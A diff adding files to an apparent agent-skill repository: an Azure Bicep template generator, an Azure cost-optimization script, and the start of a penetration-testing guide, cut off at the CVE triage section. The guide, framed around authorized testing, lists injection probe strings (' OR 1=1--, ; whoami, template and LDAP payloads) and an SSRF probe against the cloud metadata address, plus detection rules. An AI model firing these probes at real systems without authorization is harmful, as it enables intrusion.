+resource eventHubNamespace 'Microsoft.EventHub/namespaces@2023-01-01-preview' = {
+  name: '${environment}-${appName}-eh'
+  location: location
+  sku: {
+    name: 'Standard'
+    tier: 'Standard'
+    capacity: environment == 'production' ? 2 : 1
+  }
+  properties: {
+    minimumTlsVersion: '1.2'
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+resource eventHub 'Microsoft.EventHub/namespaces/eventhubs@2023-01-01-preview' = {
+  parent: eventHubNamespace
+  name: 'ingest'
+  properties: {
+    partitionCount: environment == 'production' ? 8 : 2
+    messageRetentionInDays: 7
+  }
+}
+
+resource consumerGroup 'Microsoft.EventHub/namespaces/eventhubs/consumergroups@2023-01-01-preview' = {
+  parent: eventHub
+  name: 'processing'
+}
+
+// ---------------------------------------------------------------------------
+// Synapse Analytics (Serverless SQL)
+// ---------------------------------------------------------------------------
+
+resource synapse 'Microsoft.Synapse/workspaces@2021-06-01' = {
+  name: '${environment}-${appName}-syn'
+  location: location
+  identity: { type: 'SystemAssigned' }
+  properties: {
+    defaultDataLakeStorage: {
+      accountUrl: 'https://${dataLake.name}.dfs.core.windows.net'
+      filesystem: 'curated'
+    }
+    sqlAdministratorLogin: 'sqladmin'
+    sqlAdministratorLoginPassword: 'REPLACE_WITH_KEYVAULT_REFERENCE'
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Log Analytics
+// ---------------------------------------------------------------------------
+
+resource logAnalytics 'Microsoft.OperationalInsights/workspaces@2022-10-01' = {
+  name: '${environment}-${appName}-logs'
+  location: location
+  properties: {
+    sku: { name: 'PerGB2018' }
+    retentionInDays: 30
+  }
+  tags: {
+    environment: environment
+    'app-name': appName
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Outputs
+// ---------------------------------------------------------------------------
+
+output dataLakeEndpoint string = 'https://${dataLake.name}.dfs.core.windows.net'
+output eventHubNamespace string = eventHubNamespace.name
+output synapseEndpoint string = synapse.properties.connectivityEndpoints.sql
+"""
+
+
+TEMPLATES: Dict[str, callable] = {
+    "web-app": _web_app_template,
+    "microservices": _microservices_template,
+    "serverless": _serverless_template,
+    "data-pipeline": _data_pipeline_template,
+}
+
+TEMPLATE_DESCRIPTIONS = {
+    "web-app": "App Service + Azure SQL + Front Door + Key Vault + Application Insights",
+    "microservices": "AKS + API Management + Cosmos DB + Service Bus + Key Vault",
+    "serverless": "Azure Functions + Event Grid + Service Bus + Cosmos DB",
+    "data-pipeline": "Event Hubs + Data Lake Gen2 + Synapse Analytics + Azure Functions",
+}
+
+
+# ---------------------------------------------------------------------------
+# CLI
+# ---------------------------------------------------------------------------
+
+def main():
+    parser = argparse.ArgumentParser(
+        description="Azure Bicep Generator — generate Bicep IaC templates for common Azure architecture patterns.",
+        epilog="Examples:\n"
+               "  python bicep_generator.py --arch-type web-app\n"
+               "  python bicep_generator.py --arch-type microservices --output main.bicep\n"
+               "  python bicep_generator.py --arch-type serverless --json",
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+    )
+    parser.add_argument(
+        "--arch-type",
+        required=True,
+        choices=list(TEMPLATES.keys()),
+        help="Architecture pattern type",
+    )
+    parser.add_argument(
+        "--output",
+        type=str,
+        default=None,
+        help="Write Bicep to file instead of stdout",
+    )
+    parser.add_argument(
+        "--json",
+        action="store_true",
+        dest="json_output",
+        help="Output metadata as JSON (template content + description)",
+    )
+
+    args = parser.parse_args()
+
+    template_fn = TEMPLATES[args.arch_type]
+    bicep_content = template_fn()
+
+    if args.json_output:
+        result = {
+            "arch_type": args.arch_type,
+            "description": TEMPLATE_DESCRIPTIONS[args.arch_type],
+            "bicep_template": bicep_content,
+            "lines": len(bicep_content.strip().split("\n")),
+        }
+        print(json.dumps(result, indent=2))
+    elif args.output:
+        with open(args.output, "w") as f:
+            f.write(bicep_content)
+        print(f"Bicep template written to {args.output} ({len(bicep_content.strip().split(chr(10)))} lines)")
+        print(f"Pattern: {TEMPLATE_DESCRIPTIONS[args.arch_type]}")
+        print(f"\nNext steps:")
+        print(f"  1. az bicep build --file {args.output}")
+        print(f"  2. az deployment group validate --resource-group <rg> --template-file {args.output}")
+        print(f"  3. az deployment group create --resource-group <rg> --template-file {args.output}")
+    else:
+        print(bicep_content)
+
+
+if __name__ == "__main__":
+    main()
--- a/engineering-team/azure-cloud-architect/scripts/cost_optimizer.py
+++ b/engineering-team/azure-cloud-architect/scripts/cost_optimizer.py
@@ -0,0 +1,492 @@
+#!/usr/bin/env python3
+"""
+Azure cost optimization analyzer.
+Analyzes Azure resource configurations and provides cost-saving recommendations.
+
+Usage:
+    python cost_optimizer.py --config resources.json
+    python cost_optimizer.py --config resources.json --json
+    python cost_optimizer.py --help
+
+Expected JSON config format:
+{
+  "virtual_machines": [
+    {"name": "vm-web-01", "size": "Standard_D4s_v5", "cpu_utilization": 12, "pricing": "on-demand", "monthly_cost": 140}
+  ],
+  "sql_databases": [
+    {"name": "sqldb-main", "tier": "GeneralPurpose", "vcores": 8, "utilization": 25, "monthly_cost": 400}
+  ],
+  "storage_accounts": [
+    {"name": "stmyapp", "size_gb": 500, "tier": "Hot", "has_lifecycle_policy": false}
+  ],
+  "aks_clusters": [
+    {"name": "aks-prod", "node_count": 6, "node_size": "Standard_D4s_v5", "avg_cpu_utilization": 35, "monthly_cost": 800}
+  ],
+  "cosmos_db": [
+    {"name": "cosmos-orders", "ru_provisioned": 10000, "ru_used_avg": 2000, "monthly_cost": 580}
+  ],
+  "public_ips": [
+    {"name": "pip-unused", "attached": false}
+  ],
+  "app_services": [
+    {"name": "app-web", "tier": "PremiumV3", "instance_count": 3, "cpu_utilization": 15, "monthly_cost": 300}
+  ],
+  "has_budget_alerts": false,
+  "has_advisor_enabled": false
+}
+"""
+
+import argparse
+import json
+import sys
+from typing import Dict, List, Any
+
+
+class AzureCostOptimizer:
+    """Analyze Azure resource configurations and recommend cost savings."""
+
+    def __init__(self, resources: Dict[str, Any]):
+        self.resources = resources
+        self.recommendations: List[Dict[str, Any]] = []
+
+    def analyze(self) -> Dict[str, Any]:
+        """Run all analysis passes and return full report."""
+        self.recommendations = []
+        total_savings = 0.0
+
+        total_savings += self._analyze_virtual_machines()
+        total_savings += self._analyze_sql_databases()
+        total_savings += self._analyze_storage()
+        total_savings += self._analyze_aks()
+        total_savings += self._analyze_cosmos_db()
+        total_savings += self._analyze_app_services()
+        total_savings += self._analyze_networking()
+        total_savings += self._analyze_general()
+
+        current_spend = self._estimate_current_spend()
+
+        return {
+            "current_monthly_usd": round(current_spend, 2),
+            "potential_monthly_savings_usd": round(total_savings, 2),
+            "optimized_monthly_usd": round(current_spend - total_savings, 2),
+            "savings_percentage": round((total_savings / current_spend) * 100, 2) if current_spend > 0 else 0,
+            "recommendations": self.recommendations,
+            "priority_actions": self._top_priority(),
+        }
+
+    # ------------------------------------------------------------------
+    # Analysis passes
+    # ------------------------------------------------------------------
+
+    def _analyze_virtual_machines(self) -> float:
+        savings = 0.0
+        vms = self.resources.get("virtual_machines", [])
+
+        for vm in vms:
+            cost = vm.get("monthly_cost", 140)
+            cpu = vm.get("cpu_utilization", 100)
+            pricing = vm.get("pricing", "on-demand")
+
+            # Idle VMs
+            if cpu < 5:
+                savings += cost * 0.9
+                self.recommendations.append({
+                    "service": "Virtual Machines",
+                    "type": "Idle Resource",
+                    "issue": f"VM {vm.get('name', '?')} has <5% CPU utilization",
+                    "recommendation": "Deallocate or delete the VM. Use Azure Automation auto-shutdown for dev/test VMs.",
+                    "potential_savings_usd": round(cost * 0.9, 2),
+                    "priority": "high",
+                })
+            elif cpu < 20:
+                savings += cost * 0.4
+                self.recommendations.append({
+                    "service": "Virtual Machines",
+                    "type": "Right-sizing",
+                    "issue": f"VM {vm.get('name', '?')} is under-utilized ({cpu}% CPU)",
+                    "recommendation": "Downsize to a smaller SKU. Use Azure Advisor right-sizing recommendations.",
+                    "potential_savings_usd": round(cost * 0.4, 2),
+                    "priority": "high",
+                })
+
+            # Reserved Instances
+            if pricing == "on-demand" and cpu >= 20:
+                ri_savings = cost * 0.35
+                savings += ri_savings
+                self.recommendations.append({
+                    "service": "Virtual Machines",
+                    "type": "Reserved Instances",
+                    "issue": f"VM {vm.get('name', '?')} runs on-demand with steady utilization",
+                    "recommendation": "Purchase 1-year Reserved Instance (up to 35% savings) or 3-year (up to 55% savings).",
+                    "potential_savings_usd": round(ri_savings, 2),
+                    "priority": "medium",
+                })
+
+        # Spot VMs for batch/fault-tolerant workloads
+        spot_candidates = [vm for vm in vms if vm.get("workload_type") in ("batch", "dev", "test")]
+        if spot_candidates:
+            spot_savings = sum(vm.get("monthly_cost", 100) * 0.6 for vm in spot_candidates)
+            savings += spot_savings
+            self.recommendations.append({
+                "service": "Virtual Machines",
+                "type": "Spot VMs",
+                "issue": f"{len(spot_candidates)} VMs running batch/dev/test workloads on regular instances",
+                "recommendation": "Switch to Azure Spot VMs for up to 90% savings on interruptible workloads.",
+                "potential_savings_usd": round(spot_savings, 2),
+                "priority": "medium",
+            })
+
+        return savings
+
+    def _analyze_sql_databases(self) -> float:
+        savings = 0.0
+        dbs = self.resources.get("sql_databases", [])
+
+        for db in dbs:
+            cost = db.get("monthly_cost", 200)
+            utilization = db.get("utilization", 100)
+            vcores = db.get("vcores", 2)
+            tier = db.get("tier", "GeneralPurpose")
+
+            # Idle databases
+            if db.get("connections_per_day", 1000) < 10:
+                savings += cost * 0.8
+                self.recommendations.append({
+                    "service": "Azure SQL",
+                    "type": "Idle Resource",
+                    "issue": f"Database {db.get('name', '?')} has <10 connections/day",
+                    "recommendation": "Delete unused database or switch to serverless tier with auto-pause.",
+                    "potential_savings_usd": round(cost * 0.8, 2),
+                    "priority": "high",
+                })
+
+            # Serverless opportunity
+            elif utilization < 30 and tier == "GeneralPurpose":
+                serverless_savings = cost * 0.45
+                savings += serverless_savings
+                self.recommendations.append({
+                    "service": "Azure SQL",
+                    "type": "Serverless Migration",
+                    "issue": f"Database {db.get('name', '?')} has low utilization ({utilization}%) on provisioned tier",
+                    "recommendation": "Switch to Azure SQL Serverless tier with auto-pause (60-min delay). Pay only for active compute.",
+                    "potential_savings_usd": round(serverless_savings, 2),
+                    "priority": "high",
+                })
+
+            # Right-sizing
+            elif utilization < 50 and vcores > 2:
+                right_size_savings = cost * 0.3
+                savings += right_size_savings
+                self.recommendations.append({
+                    "service": "Azure SQL",
+                    "type": "Right-sizing",
+                    "issue": f"Database {db.get('name', '?')} uses {vcores} vCores at {utilization}% utilization",
+                    "recommendation": f"Reduce to {max(2, vcores // 2)} vCores. Monitor DTU/vCore usage after change.",
+                    "potential_savings_usd": round(right_size_savings, 2),
+                    "priority": "medium",
+                })
+
+        return savings
+
+    def _analyze_storage(self) -> float:
+        savings = 0.0
+        accounts = self.resources.get("storage_accounts", [])
+
+        for acct in accounts:
+            size_gb = acct.get("size_gb", 0)
+            tier = acct.get("tier", "Hot")
+
+            # Lifecycle policy missing
+            if not acct.get("has_lifecycle_policy", False) and size_gb > 50:
+                lifecycle_savings = size_gb * 0.01  # ~$0.01/GB moving hot to cool
+                savings += lifecycle_savings
+                self.recommendations.append({
+                    "service": "Blob Storage",
+                    "type": "Lifecycle Policy",
+                    "issue": f"Account {acct.get('name', '?')} ({size_gb} GB) has no lifecycle policy",
+                    "recommendation": "Add lifecycle management: move to Cool after 30 days, Archive after 90 days.",
+                    "potential_savings_usd": round(lifecycle_savings, 2),
+                    "priority": "medium",
+                })
+
+            # Hot tier for large, infrequently accessed data
+            if tier == "Hot" and size_gb > 500:
+                tier_savings = size_gb * 0.008
+                savings += tier_savings
+                self.recommendations.append({
+                    "service": "Blob Storage",
+                    "type": "Storage Tier",
+                    "issue": f"Account {acct.get('name', '?')} ({size_gb} GB) on Hot tier",
+                    "recommendation": "Evaluate Cool or Cold tier for infrequently accessed data. Hot=$0.018/GB, Cool=$0.01/GB, Cold=$0.0036/GB.",
+                    "potential_savings_usd": round(tier_savings, 2),
+                    "priority": "high",
+                })
+
+        return savings
+
+    def _analyze_aks(self) -> float:
+        savings = 0.0
+        clusters = self.resources.get("aks_clusters", [])
+
+        for cluster in clusters:
+            cost = cluster.get("monthly_cost", 500)
+            cpu = cluster.get("avg_cpu_utilization", 100)
+            node_count = cluster.get("node_count", 3)
+
+            # Over-provisioned cluster
+            if cpu < 30 and node_count > 3:
+                aks_savings = cost * 0.3
+                savings += aks_savings
+                self.recommendations.append({
+                    "service": "AKS",
+                    "type": "Right-sizing",
+                    "issue": f"Cluster {cluster.get('name', '?')} has {node_count} nodes at {cpu}% CPU",
+                    "recommendation": "Enable cluster autoscaler. Set min nodes to 2 (or 1 for dev). Use node auto-provisioning.",
+                    "potential_savings_usd": round(aks_savings, 2),
+                    "priority": "high",
+                })
+
+            # Spot node pools for non-critical workloads
+            if not cluster.get("has_spot_pool", False):
+                spot_savings = cost * 0.15
+                savings += spot_savings
+                self.recommendations.append({
+                    "service": "AKS",
+                    "type": "Spot Node Pools",
+                    "issue": f"Cluster {cluster.get('name', '?')} has no spot node pools",
+                    "recommendation": "Add a spot node pool for batch jobs, CI runners, and dev workloads (up to 90% savings).",
+                    "potential_savings_usd": round(spot_savings, 2),
+                    "priority": "medium",
+                })
+
+        return savings
+
+    def _analyze_cosmos_db(self) -> float:
+        savings = 0.0
+        dbs = self.resources.get("cosmos_db", [])
+
+        for db in dbs:
+            cost = db.get("monthly_cost", 200)
+            ru_provisioned = db.get("ru_provisioned", 400)
+            ru_used = db.get("ru_used_avg", 400)
+
+            # Massive over-provisioning
+            if ru_provisioned > 0 and ru_used / ru_provisioned < 0.2:
+                cosmos_savings = cost * 0.5
+                savings += cosmos_savings
+                self.recommendations.append({
+                    "service": "Cosmos DB",
+                    "type": "Right-sizing",
+                    "issue": f"Container {db.get('name', '?')} uses {ru_used}/{ru_provisioned} RU/s ({int(ru_used/ru_provisioned*100)}% utilization)",
+                    "recommendation": "Switch to autoscale throughput or serverless mode. Autoscale adjusts RU/s between 10%-100% of max.",
+                    "potential_savings_usd": round(cosmos_savings, 2),
+                    "priority": "high",
+                })
+            elif ru_provisioned > 0 and ru_used / ru_provisioned < 0.5:
+                cosmos_savings = cost * 0.25
+                savings += cosmos_savings
+                self.recommendations.append({
+                    "service": "Cosmos DB",
+                    "type": "Autoscale",
+                    "issue": f"Container {db.get('name', '?')} uses {ru_used}/{ru_provisioned} RU/s — variable workload",
+                    "recommendation": "Enable autoscale throughput. Set max RU/s to current provisioned value.",
+                    "potential_savings_usd": round(cosmos_savings, 2),
+                    "priority": "medium",
+                })
+
+        return savings
+
+    def _analyze_app_services(self) -> float:
+        savings = 0.0
+        apps = self.resources.get("app_services", [])
+
+        for app in apps:
+            cost = app.get("monthly_cost", 100)
+            cpu = app.get("cpu_utilization", 100)
+            instances = app.get("instance_count", 1)
+            tier = app.get("tier", "Basic")
+
+            # Over-provisioned instances
+            if cpu < 20 and instances > 1:
+                app_savings = cost * 0.4
+                savings += app_savings
+                self.recommendations.append({
+                    "service": "App Service",
+                    "type": "Right-sizing",
+                    "issue": f"App {app.get('name', '?')} runs {instances} instances at {cpu}% CPU",
+                    "recommendation": "Reduce instance count or enable autoscale with min=1. Consider downgrading plan tier.",
+                    "potential_savings_usd": round(app_savings, 2),
+                    "priority": "high",
+                })
+
+            # Premium tier for dev/test
+            if tier in ("PremiumV3", "PremiumV2") and app.get("environment") in ("dev", "test"):
+                tier_savings = cost * 0.5
+                savings += tier_savings
+                self.recommendations.append({
+                    "service": "App Service",
+                    "type": "Plan Tier",
+                    "issue": f"App {app.get('name', '?')} uses {tier} in {app.get('environment', 'unknown')} environment",
+                    "recommendation": "Use Basic (B1) or Free tier for dev/test environments.",
+                    "potential_savings_usd": round(tier_savings, 2),
+                    "priority": "high",
+                })
+
+        return savings
+
+    def _analyze_networking(self) -> float:
+        savings = 0.0
+
+        # Unattached public IPs
+        pips = self.resources.get("public_ips", [])
+        unattached = [p for p in pips if not p.get("attached", True)]
+        if unattached:
+            pip_savings = len(unattached) * 3.65  # ~$0.005/hr = $3.65/month
+            savings += pip_savings
+            self.recommendations.append({
+                "service": "Public IP",
+                "type": "Unused Resource",
+                "issue": f"{len(unattached)} unattached public IPs incurring hourly charges",
+                "recommendation": "Delete unused public IPs. Unattached Standard SKU IPs cost ~$3.65/month each.",
+                "potential_savings_usd": round(pip_savings, 2),
+                "priority": "high",
+            })
+
+        # NAT Gateway in dev environments
+        nat_gateways = self.resources.get("nat_gateways", [])
+        dev_nats = [n for n in nat_gateways if n.get("environment") in ("dev", "test")]
+        if dev_nats:
+            nat_savings = len(dev_nats) * 32  # ~$32/month per NAT Gateway
+            savings += nat_savings
+            self.recommendations.append({
+                "service": "NAT Gateway",
+                "type": "Environment Optimization",
+                "issue": f"{len(dev_nats)} NAT Gateways in dev/test environments",
+                "recommendation": "Remove NAT Gateways in dev/test. Use Azure Firewall or service tags for outbound instead.",
+                "potential_savings_usd": round(nat_savings, 2),
+                "priority": "medium",
+            })
+
+        return savings
+
+    def _analyze_general(self) -> float:
+        savings = 0.0
+
+        if not self.resources.get("has_budget_alerts", False):
+            self.recommendations.append({
+                "service": "Cost Management",
+                "type": "Budget Alerts",
+                "issue": "No budget alerts configured",
+                "recommendation": "Create Azure Budget with alerts at 50%, 80%, and 100% of monthly target.",
+                "potential_savings_usd": 0,
+                "priority": "high",
+            })
+
+        if not self.resources.get("has_advisor_enabled", True):
+            self.recommendations.append({
+                "service": "Azure Advisor",
+                "type": "Visibility",
+                "issue": "Azure Advisor cost recommendations not reviewed",
+                "recommendation": "Review Azure Advisor cost recommendations weekly. Enable Advisor alerts for new findings.",
+                "potential_savings_usd": 0,
+                "priority": "medium",
+            })
+
+        return savings
+
+    # ------------------------------------------------------------------
+    # Helpers
+    # ------------------------------------------------------------------
+
+    def _estimate_current_spend(self) -> float:
+        total = 0.0
+        for key in ("virtual_machines", "sql_databases", "aks_clusters", "cosmos_db", "app_services"):
+            for item in self.resources.get(key, []):
+                total += item.get("monthly_cost", 0)
+        # Storage estimate
+        for acct in self.resources.get("storage_accounts", []):
+            total += acct.get("size_gb", 0) * 0.018  # Hot tier default
+        # Public IPs
+        for pip in self.resources.get("public_ips", []):
+            total += 3.65
+        return total if total > 0 else 1000  # Default if no cost data
+
+    def _top_priority(self) -> List[Dict[str, Any]]:
+        high = [r for r in self.recommendations if r["priority"] == "high"]
+        high.sort(key=lambda x: x.get("potential_savings_usd", 0), reverse=True)
+        return high[:5]
+
+
+# ---------------------------------------------------------------------------
+# CLI
+# ---------------------------------------------------------------------------
+
+def _format_text(report: Dict[str, Any]) -> str:
+    lines = []
+    lines.append(f"Current Monthly Spend: ${report['current_monthly_usd']}")
+    lines.append(f"Potential Savings:     ${report['potential_monthly_savings_usd']} ({report['savings_percentage']}%)")
+    lines.append(f"Optimized Spend:       ${report['optimized_monthly_usd']}")
+    lines.append("")
+
+    lines.append("=== Priority Actions ===")
+    for i, action in enumerate(report.get("priority_actions", []), 1):
+        lines.append(f"  {i}. [{action['service']}] {action['recommendation']}")
+        lines.append(f"     Savings: ${action.get('potential_savings_usd', 0)}")
+    lines.append("")
+
+    lines.append("=== All Recommendations ===")
+    for rec in report.get("recommendations", []):
+        lines.append(f"  [{rec['priority'].upper()}] {rec['service']} — {rec['type']}")
+        lines.append(f"    Issue: {rec['issue']}")
+        lines.append(f"    Action: {rec['recommendation']}")
+        savings = rec.get("potential_savings_usd", 0)
+        if savings:
+            lines.append(f"    Savings: ${savings}")
+        lines.append("")
+
+    return "\n".join(lines)
+
+
+def main():
+    parser = argparse.ArgumentParser(
+        description="Azure Cost Optimizer — analyze Azure resources and recommend cost savings.",
+        epilog="Examples:\n"
+               "  python cost_optimizer.py --config resources.json\n"
+               "  python cost_optimizer.py --config resources.json --json",
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+    )
+    parser.add_argument(
+        "--config",
+        required=True,
+        help="Path to JSON file with current Azure resource inventory",
+    )
+    parser.add_argument(
+        "--json",
+        action="store_true",
+        dest="json_output",
+        help="Output as JSON instead of human-readable text",
+    )
+
+    args = parser.parse_args()
+
+    try:
+        with open(args.config, "r") as f:
+            resources = json.load(f)
+    except FileNotFoundError:
+        print(f"Error: file not found: {args.config}", file=sys.stderr)
+        sys.exit(1)
+    except json.JSONDecodeError as exc:
+        print(f"Error: invalid JSON in {args.config}: {exc}", file=sys.stderr)
+        sys.exit(1)
+
+    optimizer = AzureCostOptimizer(resources)
+    report = optimizer.analyze()
+
+    if args.json_output:
+        print(json.dumps(report, indent=2))
+    else:
+        print(_format_text(report))
+
+
+if __name__ == "__main__":
+    main()
--- a/engineering-team/security-pen-testing/SKILL.md
+++ b/engineering-team/security-pen-testing/SKILL.md
@@ -0,0 +1,850 @@
+---
+name: "security-pen-testing"
+description: "Use when the user asks to perform security audits, penetration testing, vulnerability scanning, OWASP Top 10 checks, or offensive security assessments. Covers static analysis, dependency scanning, secret detection, API security testing, and pen test report generation."
+---
+
+# Security Penetration Testing
+
+Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance checking (see senior-secops) or security policy writing (see senior-security) — this is about systematic vulnerability discovery through authorized testing.
+
+---
+
+## Table of Contents
+
+- [Overview](#overview)
+- [OWASP Top 10 Systematic Audit](#owasp-top-10-systematic-audit)
+- [Static Analysis](#static-analysis)
+- [Dependency Vulnerability Scanning](#dependency-vulnerability-scanning)
+- [Secret Scanning](#secret-scanning)
+- [API Security Testing](#api-security-testing)
+- [Web Vulnerability Testing](#web-vulnerability-testing)
+- [Infrastructure Security](#infrastructure-security)
+- [Pen Test Report Generation](#pen-test-report-generation)
+- [Responsible Disclosure Workflow](#responsible-disclosure-workflow)
+- [Workflows](#workflows)
+- [Anti-Patterns](#anti-patterns)
+- [Cross-References](#cross-references)
+
+---
+
+## Overview
+
+### What This Skill Does
+
+This skill provides the methodology, checklists, and automation for **offensive security testing** — actively probing systems to discover exploitable vulnerabilities. It covers web applications, APIs, infrastructure, and supply chain security.
+
+### Distinction from Other Security Skills
+
+| Skill | Focus | Approach |
+|-------|-------|----------|
+| **security-pen-testing** (this) | Finding vulnerabilities | Offensive — simulate attacker techniques |
+| senior-secops | Security operations | Defensive — monitoring, incident response, SIEM |
+| senior-security | Security policy | Governance — policies, frameworks, risk registers |
+| skill-security-auditor | CI/CD gates | Automated — pre-merge security checks |
+
+### Prerequisites
+
+All testing described here assumes **written authorization** from the system owner. Unauthorized testing is illegal under the CFAA and equivalent laws worldwide. Always obtain a signed scope-of-work or rules-of-engagement document before starting.
+
+---
+
+## OWASP Top 10 Systematic Audit
+
+Use the vulnerability scanner tool for automated checklist generation:
+
+```bash
+# Generate OWASP checklist for a web application
+python scripts/vulnerability_scanner.py --target web --scope full
+
+# Quick API-focused scan
+python scripts/vulnerability_scanner.py --target api --scope quick --json
+```
+
+### A01:2021 — Broken Access Control
+
+**Test Procedures:**
+1. Attempt horizontal privilege escalation: access another user's resources by changing IDs
+2. Test vertical escalation: access admin endpoints with regular user tokens
+3. Verify CORS configuration — check `Access-Control-Allow-Origin` for wildcards
+4. Test forced browsing to admin pages (`/admin`, `/api/admin`, `/debug`)
+5. Modify JWT claims (`role`, `is_admin`) and replay tokens
+
+**What to Look For:**
+- Missing authorization checks on API endpoints
+- Predictable resource IDs (sequential integers vs. UUIDs)
+- Client-side only access controls (hidden UI elements without server checks)
+- CORS misconfigurations allowing arbitrary origins
+
+### A02:2021 — Cryptographic Failures
+
+**Test Procedures:**
+1. Check TLS version — reject anything below TLS 1.2
+2. Verify password hashing: bcrypt/scrypt/argon2 with adequate cost factor
+3. Look for sensitive data in URLs (tokens in query params get logged)
+4. Check for hardcoded encryption keys in source code
+5. Test for weak random number generation (Math.random() for tokens)
+
+**What to Look For:**
+- MD5/SHA1 used for password hashing
+- Secrets in environment variables without encryption at rest
+- Missing `Strict-Transport-Security` header
+- Self-signed certificates in production
+
+### A03:2021 — Injection
+
+**Test Procedures:**
+1. SQL injection: test all input fields with `' OR 1=1--` and time-based payloads
+2. NoSQL injection: test with `{"$gt": ""}` and `{"$ne": null}` in JSON bodies
+3. Command injection: test inputs with `; whoami` and backtick substitution
+4. LDAP injection: test with `*)(uid=*))(|(uid=*`
+5. Template injection: test with `{{7*7}}` and `${7*7}`
+
+**What to Look For:**
+- String concatenation in SQL queries
+- User input passed to `eval()`, `exec()`, `os.system()`
+- Unparameterized ORM queries
+- Template engines rendering user input without sandboxing
+
+### A04:2021 — Insecure Design
+
+**Test Procedures:**
+1. Review business logic flows for abuse scenarios (e.g., negative quantities in carts)
+2. Check rate limiting on sensitive operations (login, password reset, OTP)
+3. Test multi-step flows for state manipulation (skip payment step)
+4. Verify security questions aren't guessable
+
+**What to Look For:**
+- Missing rate limits on authentication endpoints
+- Business logic that trusts client-side calculations
+- Lack of account lockout after failed attempts
+- Missing CAPTCHA on public-facing forms
+
+### A05:2021 — Security Misconfiguration
+
+**Test Procedures:**
+1. Check for default credentials on admin panels
+2. Verify unnecessary HTTP methods are disabled (TRACE, DELETE on public endpoints)
+3. Check error handling — stack traces should never leak to users
+4. Review HTTP security headers (CSP, X-Frame-Options, X-Content-Type-Options)
+5. Check directory listing is disabled
+
+**What to Look For:**
+- Debug mode enabled in production
+- Default admin:admin credentials
+- Verbose error messages with stack traces
+- Missing security headers
+
+### A06:2021 — Vulnerable and Outdated Components
+
+**Test Procedures:**
+1. Run dependency audit against known CVE databases
+2. Check for end-of-life frameworks and libraries
+3. Verify transitive dependency versions
+4. Check for known vulnerable versions (e.g., Log4j 2.0-2.14.1)
+
+```bash
+# Audit a package manifest
+python scripts/dependency_auditor.py --file package.json --severity high
+python scripts/dependency_auditor.py --file requirements.txt --json
+```
+
+### A07:2021 — Identification and Authentication Failures
+
+**Test Procedures:**
+1. Test brute force protection on login endpoints
+2. Check password policy enforcement (minimum length, complexity)
+3. Verify session invalidation on logout and password change
+4. Test "remember me" token security (HttpOnly, Secure, SameSite flags)
+5. Check multi-factor authentication bypass paths
+
+**What to Look For:**
+- Sessions that persist after logout
+- Missing `HttpOnly` and `Secure` flags on session cookies
+- Password reset tokens that don't expire
+- Username enumeration via different error messages
+
+### A08:2021 — Software and Data Integrity Failures
+
+**Test Procedures:**
+1. Check for unsigned updates or deployment artifacts
+2. Verify CI/CD pipeline integrity (signed commits, protected branches)
+3. Test deserialization endpoints with crafted payloads
+4. Check for SRI (Subresource Integrity) on CDN-loaded scripts
+
+**What to Look For:**
+- Unsafe deserialization of user input (pickle, Java serialization)
+- Missing integrity checks on downloaded artifacts
+- CI/CD pipelines running untrusted code
+- CDN scripts without SRI hashes
+
+### A09:2021 — Security Logging and Monitoring Failures
+
+**Test Procedures:**
+1. Verify authentication events are logged (success and failure)
+2. Check that logs don't contain sensitive data (passwords, tokens, PII)
+3. Test alerting thresholds (do 50 failed logins trigger an alert?)
+4. Verify log integrity — can an attacker tamper with logs?
+
+**What to Look For:**
+- Missing audit trail for admin actions
+- Passwords or tokens appearing in logs
+- No alerting on suspicious patterns
+- Logs stored without integrity protection
+
+### A10:2021 — Server-Side Request Forgery (SSRF)
+
+**Test Procedures:**
+1. Test URL input fields with internal addresses (`http://169.254.169.254/` for cloud metadata)
+2. Check for open redirect chains that reach internal services
+3. Test with DNS rebinding payloads
+4. Verify allowlist validation on outbound requests
+
+**What to Look For:**
+- User-controlled URLs passed to `fetch()`, `requests.get()`, `curl`
+- Missing allowlist on outbound HTTP requests
+- Ability to reach cloud metadata endpoints (AWS, GCP, Azure)
+- PDF generators or screenshot services that fetch arbitrary URLs
+
+---
+
+## Static Analysis
+
+### CodeQL Custom Rules
+
+Write custom CodeQL queries for project-specific vulnerability patterns:
+
+```ql
+/**
+ * Detect SQL injection via string concatenation
+ */
+import python
+import semmle.python.dataflow.new.DataFlow
+
+from Call call, StringFormatting fmt
+where
+  call.getFunc().getName() = "execute" and
+  fmt = call.getArg(0) and
+  exists(DataFlow::Node source |
+    source.asExpr() instanceof Name and
+    DataFlow::localFlow(source, DataFlow::exprNode(fmt.getAnOperand()))
+  )
+select call, "Potential SQL injection: user input flows into execute()"
+```
+
+### Semgrep Custom Rules
+
+Create project-specific Semgrep rules:
+
+```yaml
+rules:
+  - id: hardcoded-jwt-secret
+    pattern: |
+      jwt.encode($PAYLOAD, "...", ...)
+    message: "JWT signed with hardcoded secret"
+    severity: ERROR
+    languages: [python]
+
+  - id: unsafe-yaml-load
+    pattern: yaml.load($DATA)
+    fix: yaml.safe_load($DATA)
+    message: "Use yaml.safe_load() to prevent arbitrary code execution"
+    severity: WARNING
+    languages: [python]
+
+  - id: express-no-helmet
+    pattern: |
+      const app = express();
+      ...
+      app.listen(...)
+    pattern-not: |
+      const app = express();
+      ...
+      app.use(helmet(...));
+      ...
+      app.listen(...)
+    message: "Express app missing helmet middleware for security headers"
+    severity: WARNING
+    languages: [javascript, typescript]
+```
+
+### ESLint Security Plugins
+
+Recommended configuration:
+
+```json
+{
+  "plugins": ["security", "no-unsanitized"],
+  "extends": ["plugin:security/recommended"],
+  "rules": {
+    "security/detect-object-injection": "error",
+    "security/detect-non-literal-regexp": "warn",
+    "security/detect-unsafe-regex": "error",
+    "security/detect-buffer-noassert": "error",
+    "security/detect-eval-with-expression": "error",
+    "no-unsanitized/method": "error",
+    "no-unsanitized/property": "error"
+  }
+}
+```
+
+---
+
+## Dependency Vulnerability Scanning
+
+### Ecosystem-Specific Commands
+
+```bash
+# Node.js
+npm audit --json | jq '.vulnerabilities | to_entries[] | select(.value.severity == "critical")'
+
+# Python
+pip audit --format json --desc
+safety check --json
+
+# Go
+govulncheck ./...
+
+# Ruby
+bundle audit check --update
+```
+
+### CVE Triage Workflow
+
